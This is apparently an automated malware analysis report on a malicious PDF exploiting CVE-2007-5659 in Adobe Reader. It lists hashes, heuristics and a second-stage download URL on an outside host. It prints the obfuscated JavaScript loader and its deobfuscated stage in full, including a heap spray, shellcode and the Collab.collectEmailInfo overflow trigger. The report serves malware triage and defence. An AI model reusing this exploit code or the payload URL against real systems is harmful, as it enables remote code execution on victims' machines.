Malicious PDF — malware analysis report

Static analysis result for SHA-256 b48d5f0b7791d98e…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2012-07-06
MD5: 4acef606ea99095b8fc83843f379ff13 SHA-1: 41c283aba3625d5708fd3296aa29ac7a246e6f83 SHA-256: b48d5f0b7791d98e23b59dcab58d5ab5bc899d51eec6c4c04d7326062d1b63f2
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The PDF_EVAL firing specifically points to an eval() call within a decoded stream, suggesting an attempt to execute obfuscated code. While the exact payload is not discernible due to obfuscation, the presence of eval() and embedded JavaScript strongly suggests an attempt to download and execute a second-stage payload. No specific malware family could be identified.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function bCzgGkpFBmfGv(){eval("function im"+"p"+"lo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function CYhWI0(vXjFvs){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(vXjFvs)"+";"+"}");eval("function Kum4fNKy9gOS(Riv3g5){var IPnAMvWpRMHimS="+"0,SCOcH5MhUsaStw=Riv3g5.l"+"en"+"gth,e0CYvqRo37L=10"+"2"+"4,vsVR923oPPq4A,wUkLj,cZ4SUS='',t9bGKaeIxYq=IPnAMvWpRMHimS,oWTaid7yZyb=IPnAMvWpRMHimS,Uz2X3a5=IPnAMvWpRMHimS,JH670LzVvz=Ar"+"ra"+"y(6 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://q850.com/modules/tmp/load.php?id=54&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36B 6642 bytes
SHA-256: 7867f1ce28040e08ca7d4b35d58530aaab764d78925e9404f3fb61e58de419a9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 121 of 242 identifiers look randomly generated (e.g. 'KC55t0kIXxydxf5wXGHyohjq5v6ZGc0N_q5'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function bCzgGkpFBmfGv(){eval("function im"+"p"+"lo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function CYhWI0(vXjFvs){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(vXjFvs)"+";"+"}");eval("function Kum4fNKy9gOS(Riv3g5){var IPnAMvWpRMHimS="+"0,SCOcH5MhUsaStw=Riv3g5.l"+"en"+"gth,e0CYvqRo37L=10"+"2"+"4,vsVR923oPPq4A,wUkLj,cZ4SUS='',t9bGKaeIxYq=IPnAMvWpRMHimS,oWTaid7yZyb=IPnAMvWpRMHimS,Uz2X3a5=IPnAMvWpRMHimS,JH670LzVvz=Ar"+"ra"+"y(63,38,16,28,36,43,50,42,4,29,0,0,0,0,0,0,21,24,25,31,52,17,7,47,49,46,12,2,54,55,37,14,5,8,3,62,19,59,40,44,39,23,33,0,0,0,0,18,0,6,58,45,34,10,30,61,60,1,48,56,9,51,41,11,22,26,20,27,35,32,13,53,15,57,0);f"+"o"+"r(wUkLj=M"+"at"+"h.c"+"ei"+"l(SCOcH5MhUsaStw/"+"e0CYvqRo37L)"+";wUkLj>IPnAMvWpRMHimS;wUkLj-"+"-){fo"+"r(vsVR923oPPq4A=Ma"+"th.m"+"in(SCOcH5MhUsaStw,e0CYvqRo37L);vsVR923oPPq4A>IPnAMvWpRMHimS;vsVR923oPPq4A-"+"-,SCOcH5MhUsaStw-"+"-){Uz2X3a5|"+"=(JH670LzVvz[Riv3g5.cha"+"rCod"+"eAt(t9bGKaeIxYq+"+"+)-48])<"+"<oWTaid7yZyb;if(oWTaid7yZyb){cZ4SUS+"+"=CYhWI0"+"(141^Uz2X3a5&"+"2"+"5"+"5);Uz2X3a5>"+">="+"8;oWTaid7yZyb-"+"="+"2;}el"+"se{oWTaid7yZyb="+"6"+";}}"+"}return (cZ4SUS);}var RQimIsz=implode('',['c','IxU0M7','jnY','fLdCc','bf','m3','IcKs5ttIS','c6h0','0m','OgN','_7ccIOSt','UfS4oSk','c','_x','HNM','U','IJGWmXRhg','oM','oINdxLBFIG','OU3kPY0U','Z','L','bHfGUS1RSbZTq','5LM7','SNTfk','V','M','qn','kt9LZU5','m','OFfHw','0SVZt','S','k7X','C','yXSsWFUgI','U','s','O','k5FO','nL','txLBFI','GOU3kPY0UcqeWc','dxLBFIGO','U3kP','Y','0U','LKC5','kt9LZU5','mOFfHw0f','5jLeSAX9k','SbWmZY3gGx70','k0I0y0','xyt','5fngabH','f','G','US1RS','bZobG4qs50tfSk00kc','dxLBFIG','O','U','3','kPY0ULL','eh','cIOS','t','UfS4oSkc1','cU','ZGckSFIMN','_','q5LMbSW','0C5xm','gLkSCGwL','eW','cLsggb','fGIM5UgbIccIx','U0','M','7yDxhM0','U','U','IcKs5kxOb','SUOU','g','tfnG','deSyb','sISdeSybs','ISdeSybsISde','Sg','IJ6','xte','SSb','oIxteSUI5','m','D','deS','wL','UmDd','eSwLsG','hdeS','QGWGSdeSQ0sISde','SQ0h','6Jt','eSQY','sG','kdeSoGJ6OteSo','Gh6oteSw','SWIoteSl','G3I','QteSQGJ6','oteS','U1o6o','te','SQU','om','oteSDIhI','y','deS','yS','U6','SdeSD','I','hIydeSUd','J6b','deSQG3GSdeSQGJ6x','teSU1o6','oteSxT','sGSdeSU','6scbdeSQm','omhdeS','g7sGSde','S','QGJGh','deSQGJ','6ot','eSJmhIUdeSxT','o6x','t','e','Sb7scbdeSUd','o','GhdeSg7o','6hdeSQG','J','GoteSQ','GJ6oteSJmhIUdeSx','To6bdeSOm3cbdeShLoIot','eSg7UGlt','eSQG3G','lteS','QGJ6oteSJ','mhI','UdeSxTo6SdeSgLsc','bdeSg','IhGhdeS','g7scoteSQG','W','Gx','teSQGJ','6ot','eSJm','h','IUde','SxTU','6','ot','eS0d3cbdeSg6J','cU','deSg7o','IbdeSQGhGDd','eS','QGJ','6o','te','SJmhIU','deSJGh6xt','eSl5UIoteSD','6','hGOt','eSUIoGk','d','eSo5omJ','teSQYs','GUd','eS','QGJ6QteS','x','mo6oteSD6hI','Ud','e','S','U15mxteSQ0Jm','J','te','SQt3','ckdeSU1','Um','UdeSo','5UmJteSg7Um','Dde','SQ','GhIy','deSQG','J','6ot','eSw7','UmoteS','ots6','DdeSD','I','WmgdeS','bp','sGbd','eSQGJ6oteSU','Io6oteSoUomJteS06h','Iyde','S0IhIOteSUI','Um','ot','eSOG','JmJteS','hLs','cb','d','eSQ','GJ6o','teSxGJ','6o','teSJm','hI','yd','eS','wdU6','xte','Sx','Go6l','teSxmhIydeSg7U6','bd','eSQG3cQt','eSQGJ','6oteSJmJ6OteS0p','5mo','teSxUo','6oteSO','mochdeS0p','scJteSQ0Jmot','eSw6JcbdeSQGJ6oteSD6','J','GgdeSU1','5','m','oteSQUomJteS','Q','t3ckde','SU1U','mUdeSo5UmJteSJG3G','bde','SQGJ6o','t','eS','wdo6o','teSx5o6wdeSJmJ6Ote','SlUWmxteS','xUWGyd','eShLUm','O','teSOGJcJteS','xUhmoteSJmhIy','deSwdU6SdeSxGo6','Jte','S','xmhIyde','Sg','7U','6bdeSQGWm','Ote','SQGJ6','o','t','eSQG3c','kd','eSD6JGgde','SU1','5mot','eSQ5omJt','eSQ','X','3','ckdeSU1U','m','UdeSo','5','U','mJteSoG3GbdeSQGJ6oteSwdo','6ote','SU','1oGgde','S','o','GJmJteSQt3ckd','eSU','1UmUdeSo5UmJteSQG3Gbd','eSQGJ6o','teSJ','t','J6ot','eSx','Xhm','ydeSg','dJ6Ote','S','gdJ6OteSg','dJ6OteSgdJ6OteSg','bUIOt','e','Sx','to','6x','te','SU1','U','mOte','S','g','1WG','kdeS','x','XJGwde','SgIJGgdeSU1','Um','J','teS','U1sGS','deSQ5oc0','deS','x0UIy','de','SxTo6SdeSDb','hIydeSU1s','6SdeSomo','cxt','eSQ','UJ','cbd','eS','x','ToGOt','e','SD_U','Iyd','eSQU','WmoteSlUJG','O','t','e','SJGUGUdeSySomQt','eS','0b','J6OteSlUhmDd','e','SQMoG','DdeS','o','GJ','I','hd','eSh136','kdeSQ5ocx','teS','0','6','U','GQte','SQUJ60d','e','SJGJGlteShd3Gyde','Sh6s6ydeSD6hm','hdeS','xtsGJ','teSg1UIyd','eSxtU','Iy','deSQ','UWmx','teSw','_5G0d','eS','QUUIydeSU1o','myd','eSoUUmk','de','SS','So6O','te','SQ0hIyde','S','QUhIydeSxm','UGJt','eS01hm0deSQ','GJ6bd','eSh','S3GbdeSh','LoG','hdeSxm','JGgd','eSJUUmlt','e','SJMom0','deSQG','J','m','hdeSb1','UIwdeSbL','5Iy','d','e','S','0IWGJ','teSb6','UGo','t','e','SSd','5Gwde','S0dWGgdeSUIh','IS','d','eS0IhIlteSU','Ih','Ilt','eS','b','dU','I','yd','eSUdU','IOteS0IWISd','eSU1WIy','deS0IWIgd','e','S','UIhIO','teSU1UIhde','SbLUG','QteSbLUIwdeSU_5GoteS','S1','hIyd','eSS15GkdeSbbUGUdeSUbWI','gdeSS15','Gl0','e','n','LLbSW','0C5Zm9L','YT','CMwOSUPt','o6cKs5gpCI','gLsGgL5ccIxU','0MqwD','SW','k','b635jL7yDxhM0','UUIt','a','Obt','5fSNMbncS5c','c','IxU0MbHfGU','S1RSbZMeWcaO','MBCvg9YUkGYJIQMeVc','p','qwDS','W','k','b6WngpGGw_7ccIx','U','0M','e','SAX9kSb','W','m','ZY3','gGMeWcd0kVUGUW','MxbNSe7kTs','GDL','o7kTsGDLU54qs5k','t9LZU5m','OFfHw','0f5jLeg8YfGU6h6OCOjMG','3','GkpeSA','X9kSbWmZY3g','GFq5','F','UgIUs','Ok5FOnLL','b','SW0','C5A5','5','jDm3GcKs','5','N','S','JMst','U0gps','5','uLqGw','XsGg','LsGg_7VZm9LYTC','Mw','OSUP','t','o','6LLb','b','d0C5NIx','U0','Mb','yOt','IkCGCH9MG','mIRs','G','LfIm','VoS','MUY3M','gUWUHd','cIKTxmgqUyOtIkCGCH','9MGmIs','7n4L7','gce3bN','XckY5IMJX','5wX','UJ','bd','0gSP','M90OUODcKs5kt9LZ','U','5m','OFfHw','0','f51L7','yD','xhM0U','UILLe','hc','KC55t0kIXxydxf5wXGHyohjq5v6ZGc0N_q5','L','M','b','S','W0C5St3c','45xjcK','s5W','M','C0tI','xyV5xb0Gvb','0UxydxSV','yoIMy','0xy','t5','f','n4q','s','5St3','c4','5xjcKs5St3c45x','jtS','xbgFOUIt','fn','da96d7f','VGSenLLbS','W0C5gGCG0b35jL','bkV5C5','J000W','TCnSt3c45x','jtbfyW0x','myYqG4a70QY','oyb','R','hVIYOU0','m3SN','6','onZbx6w','_I','Szx','7UNm','S0JX','Cn','0_e','nLLe','y5MqnNL0SgS5mpMoDcKoWcps','5','5','Iq5N','pq0UMU','G','OsvG2','MeWjL','eGcIb7cL0SgS5','mp0o','Dca','s50_q5H','FC5g','GCG','0bWwhK95HL','eG4_q5','HFC5NL0','SgS5mpMoD','cK','oW','c','7s55Iq5','gGC','G0bWwhK95HLe','G4LqhHM','qn','gGCG0bWwgK95H','L7I4','_q5L','MqLIFS','LdU','CkfY','enLLbSW0C5','k5C','0g','FILPT95','j','LeSttI0Imf','0','VYb5VdCGI','M5UVdCGIM5UG_7cc7','Cy4','FObNdGSg','MCk','q','Y','JwtaObt5','fSNM','q','Wc1sIDdUG4','LeS','bM','C0','Z59','HrM','7njL','e','SbMC0Z59Hr','s','s5yYOySx7UdFfkW0IMyoS0','VMeWcb','WkZFOU','Gx7','UdFfk','VUfSQROU4FOHtGIkNqG0k','0SyML','b5Gae','kS5S','ccdGSg','MCkqYJwjT7','c','cK','C5jM','qg','ys','3','SKxW','Lqt3ksUCn4qo']);");eval(Kum4fNKy9gOS(RQimIsz));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36B 2543 bytes
SHA-256: a2838db4782ce953ee2c5ba986b9568cfca38ed15f070ed9328066930c08ab1b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var OdhToZgSA4 = new Array(); function yIh06AFCjMzF05(uUTl3CClHxb, JS6vkmfl) { while (uUTl3CClHxb.length*2<JS6vkmfl){uUTl3CClHxb += uUTl3CClHxb;} uUTl3CClHxb = uUTl3CClHxb.substring(0,JS6vkmfl/2); return uUTl3CClHxb; } function TclVoslS() { var BQV5r08 = 0x0c0c0c0c; var kyNRr36 = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u712F%u3538%u2E30%u6F63%u2F6D%u6F6D%u7564%u656C%u2F73%u6D74%u2F70%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3435%u7326%u6C70%u343D"); var lQTZyP8nbH5E = 0x400000; var X9Bo7A = kyNRr36.length * 2; var JS6vkmfl = lQTZyP8nbH5E - (X9Bo7A+0x38); var uUTl3CClHxb = unescape("%u9090%u9090"); uUTl3CClHxb = yIh06AFCjMzF05(uUTl3CClHxb, JS6vkmfl); var U7OyA0 = (BQV5r08 - 0x400000)/lQTZyP8nbH5E; for (var jCeoRvHPpCc=0;jCeoRvHPpCc<U7OyA0;jCeoRvHPpCc++) { OdhToZgSA4[jCeoRvHPpCc] = uUTl3CClHxb + kyNRr36; } } function xtKtONWWElVs() { var sE8iwM = app.viewerVersion.toString(); sE8iwM = sE8iwM.replace(/\D/g,""); var pv02C = new Array(sE8iwM.charAt(0),sE8iwM.charAt(1),sE8iwM.charAt(2)); if ((pv02C[0] == 8 && ((pv02C[1] == 1 && pv02C[2] < 2) || pv02C[1] < 1)) || (pv02C[0] == 7 && pv02C[1] < 1) || (pv02C[0] < 7)) { TclVoslS(); var uwpplWHY = unescape("%u0c0c%u0c0c"); while(uwpplWHY.length < 44952) uwpplWHY += uwpplWHY; this.collabStore = Collab.collectEmailInfo({subj: "",msg: uwpplWHY}); } } xtKtONWWElVs();